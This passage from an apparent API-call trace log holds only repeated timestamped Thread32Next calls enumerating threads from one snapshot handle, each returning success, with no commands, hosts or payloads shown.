(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.978] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.217] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.219] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.220] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.221] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.222] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.223] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.224] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.225] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.226] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.227] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.227] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.229] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.229] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.230] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.230] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.232] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.236] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.236] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.242] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.242] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.247] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.609] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.612] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.614] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.617] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.893] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 